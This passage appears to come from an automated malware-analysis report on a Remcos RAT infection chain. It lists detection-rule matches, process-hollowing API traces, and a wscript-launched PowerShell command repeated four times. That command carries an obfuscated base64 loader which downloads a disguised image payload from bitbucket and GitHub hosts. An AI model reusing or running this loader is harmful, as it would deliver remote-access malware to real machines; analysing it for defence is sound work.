                      Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000021.00000002.1754049222.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 7560, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 7696, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 1280, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 1280, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: RegAsm.exe PID: 7660, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#CJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = 'WwBO#GU#d##u#FM#ZQBy#HY#aQBj#GU#U#Bv#Gk#bgB0#E0#YQBu#GE#ZwBl#HI#XQ#6#Do#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b##g#D0#I#Bb#E4#ZQB0#C4#UwBl#GM#dQBy#Gk#d#B5#F##cgBv#HQ#bwBj#G8#b#BU#Hk#c#Bl#F0#Og#6#FQ#b#Bz#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I#B7#C##c#Bh#HI#YQBt#C##K#Bb#HM#d#By#Gk#bgBn#Fs#XQBd#CQ#b#Bp#G4#awBz#Ck#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#B3#GU#YgBD#Gw#aQBl#G4#d##g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#C##PQ#g#Ec#ZQB0#C0#UgBh#G4#Z#Bv#G0#I##t#Ek#bgBw#HU#d#BP#GI#agBl#GM#d##g#CQ#b#Bp#G4#awBz#C##LQBD#G8#dQBu#HQ#I##k#Gw#aQBu#Gs#cw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgBv#HI#ZQBh#GM#a##g#Cg#J#Bs#Gk#bgBr#C##aQBu#C##J#Bz#Gg#dQBm#GY#b#Bl#GQ#T#Bp#G4#awBz#Ck#I#B7#C##d#By#Hk#I#B7#C##cgBl#HQ#dQBy#G4#I##k#Hc#ZQBi#EM#b#Bp#GU#bgB0#C4#R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#K##k#Gw#aQBu#Gs#KQ#g#H0#I#Bj#GE#d#Bj#Gg#I#B7#C##YwBv#G4#d#Bp#G4#dQBl#C##fQ#g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I#By#GU#d#B1#HI#bg#g#CQ#bgB1#Gw#b##g#H0#Ow#g##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##k#Gw#aQBu#Gs#cw#g#D0#I#B##Cg#JwBo#HQ#d#Bw#HM#Og#v#C8#YgBp#HQ#YgB1#GM#awBl#HQ#LgBv#HI#Zw#v#Gc#Z#Bm#GY#ZgBm#GY#ZgBm#GY#LwBk#GQ#Z#Bk#GQ#LwBk#G8#dwBu#Gw#bwBh#GQ#cw#v#Gk#bQBn#F8#d#Bl#HM#d##u#Go#c#Bn#D8#MQ#x#Dg#MQ#x#Dc#Mw#1#Cc#L##g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#HI#YQB3#C4#ZwBp#HQ#a#B1#GI#dQBz#GU#cgBj#G8#bgB0#GU#bgB0#C4#YwBv#G0#LwBz#GE#bgB0#G8#bQBh#Gw#bw#v#GE#dQBk#Gk#d##v#G0#YQBp#G4#LwBp#G0#ZwBf#HQ#ZQBz#HQ#LgBq#H##Zw#/#DE#N##0#DQ#MQ#3#DI#Mw#n#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I##k#Gk#bQBh#Gc#ZQBC#Hk#d#Bl#HM#I##9#C##R#Bv#Hc#bgBs#G8#YQBk#EQ#YQB0#GE#RgBy#G8#bQBM#Gk#bgBr#HM#I##k#Gw#aQBu#Gs#cw#7##0#Cg#g#C##I##g#C##I##g#C##I##g#C##I##g#Gk#Zg#g#Cg#J#Bp#G0#YQBn#GU#QgB5#HQ#ZQBz#C##LQBu#GU#I##k#G4#dQBs#Gw#KQ#g#Hs#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBU#GU#e#B0#C4#RQBu#GM#bwBk#Gk#bgBn#F0#Og#6#FU#V#BG#Dg#LgBH#GU#d#BT#HQ#cgBp#G4#Zw#o#CQ#aQBt#GE#ZwBl#EI#eQB0#GU#cw#p#Ds#DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#C##J#Bl#G4#Z#BG#Gw#YQBn#C##PQ#g#Cc#P##8#EI#QQBT#EU#Ng#0#F8#RQBO#EQ#Pg#+#Cc#Ow#g#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#D0#I##k#Gk#bQBh#Gc#ZQBU#GU#e#B0#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#cwB0#GE#cgB0#EY#b#Bh#Gc#KQ#7#C##DQ#K#C##I##g#C##I##g#C##I##g#C##I##g#CQ#ZQBu#GQ#SQBu#GQ#ZQB4#C##PQ#g#CQ#aQBt#GE#ZwBl#FQ#ZQB4#HQ#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bl#G4#Z#BG#Gw#YQBn#Ck#Ow#N##o#I##g#C##I##g#C##I##g#C##I##g#C##I#Bp#GY#I##o#CQ#cwB0#GE#cgB0#Ek#bgBk#GU#e##g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#GU#bgBk#Ek#bgBk#GU#e##g#C0#ZwB0#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#Ck#I#B7#C##J#Bz#HQ#YQBy#HQ#SQBu#GQ#ZQB4#C##Kw#9#C##J#Bz#HQ#YQBy#HQ#RgBs#GE#Zw#u#Ew#ZQBu#Gc#d#Bo#Ds#I##N##o#I##g#C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,33_2_0041812A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,33_2_0041330D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,33_2_0041BBC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 33_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,33_2_0041BB9A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,37_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_00401806 NtdllDefWindowProc_W,37_2_00401806
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 37_2_004018C0 NtdllDefWindowProc_W,37_2_004018C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_004016FD NtdllDefWindowProc_A,38_2_004016FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 38_2_004017B7 NtdllDefWindowProc_A,38_2_004017B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00402CAC NtdllDefWindowProc_A,40_2_00402CAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 40_2_00402D66 NtdllDefWindowProc_A,40_2_00402D66
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A62C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF7D2A62C54
                      Source: C:\Users\user\Desktop\6706e721f2c06.exeCode function: 0_2_00007FF7D2A61C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,0_2_00007FF7D2A61C0C
                      Source: C:\Users\user\AppData\Local\Temp\PdfReaderEn.EXECode function: 11_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,11_2_00403883
